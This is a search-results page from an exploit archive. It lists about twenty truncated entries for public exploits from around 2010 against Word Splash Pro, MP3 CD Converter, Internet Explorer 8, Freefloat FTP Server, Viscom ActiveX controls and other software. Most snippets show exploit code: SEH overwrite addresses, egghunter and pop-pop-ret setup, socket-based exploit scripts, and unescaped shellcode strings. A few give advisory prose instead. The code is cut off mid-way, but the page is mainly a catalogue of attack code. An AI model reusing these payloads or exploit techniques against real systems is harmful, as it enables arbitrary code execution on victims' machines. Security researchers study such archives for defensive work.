7260 matches found
Word Splash Pro <= 9.5 Buffer Overflow
Exploit for windows platform in category local exploits Exploit Title: Word Splash Pro Word list-Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "\xeb\x06\x90\x90"; jump 6 bytes my $seh = pack'V', 0x01de44dc; pop pop ret from CRDE2000.DLL my $egg =...
MP3 CD Converter Professional Buffer Overflow
!/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.0.3...
MP3 CD Converter Professional - Local Buffer Overflow (SEH)
MP3 CD Converter Professional - Local Buffer Overflow SEH !/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link:...
Word Splash Pro 9.5 - Local Buffer Overflow
Exploit Title: Word Splash Pro Word list-Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "\xeb\x06\x90\x90"; jump 6 bytes my $seh = pack'V', 0x01de44dc; pop pop ret from CRDE2000.DLL my $egg = "w00tw00t"; my $egghunter =...
MP3 CD Converter Professional - Local Buffer Overflow (SEH)
!/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.0.3...
Internet Explorer 8 CSS Parser Exploit
No description provided by source. !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code...
Internet Explorer 8 CSS Parser Exploit
!/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code = opts:code message = opts:message...
Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH)
Exploit for windows platform in category local exploits Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1SEH Date: 16/12/2010 Author: C4SS!0 G0M3S Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe Version: 111 Tested on: WIN-XP SP3 PT-BR CVE: N/A...
DCE-RPC Fragmented Requests (CVE-2010-0102)
DCE/RPC stands for Distributed Computing Environment / Remote Procedure Calls. It is a Remote Procedure Call system that allows software to work across multiple computers, as if it were all working on the same computer. This system allows programmers to write distributed software without having t...
MS-RPC over CIFS Fragmentation (CVE-2010-0102)
DCE/RPC stands for Distributed Computing Environment / Remote Procedure Calls. It is a Remote Procedure Call system that allows software to work across multiple computers, as if it were all working on the same computer. This system allows programmers to write distributed software without having t...
Microsoft Internet Explorer 8 - CSS Parser
Microsoft Internet Explorer 8 - CSS Parser !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts =...
Microsoft Internet Explorer 8 - CSS Parser
!/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code = opts:code message = opts:message...
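Winamp "in_midi" Component MIDI Timestamp Stack Buffer Overflow Vulnerability
BUGTRAQ ID: 45221 Winamp is a popular media player that supports many file formats. Winamp has an implementation flaw that an attacker can exploit to execute arbitrary code in the affected application with the user's privileges and cause a denial of service. The vulnerability stems from a failure to perform sufficient bounds checking on user-supplied data. Winamp's stack allocation is predictable. The attacker can choose the value written to the saved base pointer, so that when the base pointer is restored, the calling function's stack frame is moved to an attacker-controlled return address. Nullsoft Winamp 5.01 - 5.5.8 Vendor patch: Nullsoft -------- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...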
Freefloat FTP Server Buffer Overflow Vulnerability 0day
Exploit for windows platform in category remote exploits ======================================================= Freefloat FTP Server Buffer Overflow Vulnerability 0day ======================================================= Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date:...
Viscom VideoEdit Gold ActiveX 8.0 - Code Execution
// Ctrl+C Ctrl+V, herpderp // calc.exe var shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...
Freefloat FTP Server - Remote Buffer Overflow
Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date: 12/05/2010 Author: 0v3r Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import socket import sys def usage: print "usage : ./freefloatftp.py " pri...
Image Viewer CP Gold 6 Buffer Overflow
//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...
MediaCoder 0.7.5.4795 Buffer Overflow
Exploit Title: MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow SEH Date: 02 / 12 / 2010 Author: Oh Yaw Theng Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4795.exe Version: v0.7.5.4795 Latest Version !! Tested on: Microsoft Windows XP SP2 CVE : N / A The vendor is...
CVE-2009-0658 vulnerability analysis-vulnerability warning-the black bar safety net
Author: Peter Kleissner http://web17.webbpro.de/index.php?page=analysing-the-pdf-exploit translation: Cryin' http://hi.baidu.com/justear I want to share with you the results of analysing an Adobe PDF vulnerability from March 2009; the vulnerability is due to a bug in JBIG2 compression that leads to th...
Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow
//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...